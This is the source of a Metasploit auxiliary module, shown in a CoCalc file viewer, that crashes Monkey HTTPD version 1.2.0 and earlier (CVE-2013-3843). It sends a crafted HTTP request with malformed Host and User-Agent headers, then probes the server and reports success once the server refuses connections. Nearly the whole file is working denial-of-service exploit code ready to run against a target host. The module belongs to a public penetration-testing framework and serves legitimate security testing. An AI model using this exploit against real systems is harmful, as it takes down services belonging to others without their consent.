CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'Monkey HTTPD Header Parsing Denial of Service (DoS)',
13
      'Description'    => %q{
14
          This module causes improper header parsing that leads to a segmentation fault
15
        due to a specially crafted HTTP request. Affects version <= 1.2.0.
16
      },
17
      'Author'         =>
18
        [
19
          'Doug Prostko <dougtko[at]gmail.com>'
20
        ],
21
      'License'        => MSF_LICENSE,
22
      'References'     =>
23
        [
24
          ['CVE', '2013-3843'],
25
          ['OSVDB', '93853'],
26
          ['BID', '60333']
27
        ],
28
      'DisclosureDate' => '2013-05-30'))
29

30
    register_options(
31
      [
32
        Opt::RPORT(2001)
33
      ])
34
  end
35

36
  def dos
37
    req = "GET / HTTP/1.1\r\n"
38
    req << "Host:\r\n\r\nlocalhost\r\n"
39
    req << "User-Agent:\r\n\r\n"
40

41
    connect
42
    sock.put(req)
43
    disconnect
44
  end
45

46
  def is_alive?
47
    begin
48
      connect
49
    rescue Rex::ConnectionRefused
50
      return false
51
    ensure
52
      disconnect
53
    end
54

55
    true
56
  end
57

58
  def run
59
    print_status("#{rhost}:#{rport} - Sending DoS packet...")
60
    dos
61

62
    print_status("#{rhost}:#{rport} - Checking server status...")
63
    select(nil, nil, nil, 1)
64

65
    if is_alive?
66
      print_error("#{rhost}:#{rport} - Server is still alive")
67
    else
68
      print_good("#{rhost}:#{rport} - Connection Refused: Success!")
69
    end
70
  end
71
end
72

73